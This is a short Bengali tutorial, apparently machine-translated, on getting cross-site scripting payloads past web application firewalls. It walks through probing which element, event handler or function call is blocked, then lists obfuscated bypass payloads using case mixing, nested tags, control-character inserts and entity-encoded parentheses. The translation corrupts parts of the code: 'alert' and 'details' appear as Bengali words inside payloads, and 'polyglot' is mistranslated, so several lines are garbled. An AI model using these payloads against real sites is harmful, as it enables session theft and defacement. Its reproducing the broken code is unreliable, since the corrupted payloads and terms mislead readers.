সবাই কেমন আছেন.
আমি এই নিবন্ধটি লিখেছি অন্যান্য অনেক বন্ধুর অভিযোগের সাথে সম্পর্কিত যারা এখনও XSS নিয়ে বিভ্রান্ত, অনুগ্রহ করে মনে রাখবেন, এটি শুধুমাত্র একটি সামান্য তথ্য যা আমি শেয়ার করতে পারি।
দৃশ্যকল্প:
<(1) (2)=(3)>
<(1) (2)="(3)"> ক্লিক করুন৷
<(1)>(3)</(1)>
মন্তব্য:
(1) = উপাদান
(2) = বহুগোত্র
(3) = উইন্ডো অবজেক্ট
পূর্বে, আসুন কিছু XSS পেলোড দেখি যা প্রায়শই আকারে ব্যবহৃত হয়:
1. <svg onload=alert(1)>
2. <a href="javascript:alert(1)">ক্লিক করুন৷
3. <script>সতর্কতা(1)</script>
যখন এমন একটি ঘটনা ঘটে যেখানে আক্রমণকারীকে WAF বাইপাস করতে হয়, আক্রমণকারীকে অবশ্যই তথ্য সংগ্রহ করতে হবে যে WAF দ্বারা কি ব্লক করা হয়েছে। এবং যদি আক্রমণকারী XSS বাইপাস WAF পেলোডে প্রবেশ করে যা অনেক রেফারেন্সে রয়েছে এবং ফলাফলটি এখনও অবরুদ্ধ। এখানে আক্রমণকারী অবশ্যই বিভ্রান্ত হবে, কারণ তারা জানে না কোন অংশটি অবরুদ্ধ।
চলুন এক মুহুর্তের জন্য এই বাইপাস এক্সএসএস বিশ্লেষণের সহজ কৌশলটি দেখার জন্য আপনার সময় নিন
প্রথমে, আক্রমণকারীকে প্রথমে বিশ্লেষণ করতে হবে কোন অংশটি ব্লক করা হয়েছে, উদাহরণস্বরূপ:
ধাপ পুনর্গঠন কর :
1. উপাদান বিশ্লেষণ করুন
<SVG=>
যদি কিছু উপাদান WAF দ্বারা ব্লক করা হয়, তাহলে সেখানে সম্পূর্ণ পেলোড রাখা চালিয়ে যাবেন না, কারণ এটি অকেজো। আসুন কিছু অন্যান্য উপাদান চেষ্টা করি যা WAF দ্বারা পাস করা বা অবরুদ্ধ করা হয়নি
2. পলিগট বিশ্লেষণ করুন
<svg onload=>
দেখুন, এখানে উইন্ডো অবজেক্ট খালি কেন?
যদি আক্রমণকারী সমস্ত XSS উপাদান প্রবেশ করে, তাহলে WAF ব্লক করা হয়। তাহলে এটা আক্রমণকারীকে বিভ্রান্ত করবে
3. উইন্ডো অবজেক্ট বিশ্লেষণ করুন
আপনি যদি পূর্ববর্তী ধাপ থেকে পেলোড বাইপাস খুঁজে বের করতে সক্ষম হন এবং এটি প্রক্রিয়ার শেষ হয়, যদি আপনি alert() প্রবেশ করেন, তাহলে WAF থাকলে এটি অবশ্যই ব্লক করা হবে। এখানে আক্রমণকারীকে অবশ্যই উইন্ডো অবজেক্টের জন্য একটি বাইপাস খুঁজে বের করতে হবে।
পেলোড বাইপাস সংগ্রহ:
1. উপাদান (1)
<বিস্তারিত>
<আআআআআআআআআ/>
<SCrip%0s>
<ScR<script>IpT>
2. বহুজাতি (2)
<(1) OnX=() OnLOad=>
<(1) OnX=""/**/ OnTOggle=>
<(1) %01OnCLicK=>
<(1) OnCliCk%0b=%0b>
3. উইন্ডো অবজেক্ট (3)
<(1) (2) = সতর্কতা&#x000D()>
<(1) (2)=[(সতর্ক)/**/()]>
<(1) (2)=সতর্ক&#00000040;&#00000041;>
আরো কিছু পেলোড আছে যেগুলো এখানে শেয়ার করার জন্য আমার কাছে সময় নেই। হয়তো ভবিষ্যতে কখনো শেয়ার করব।
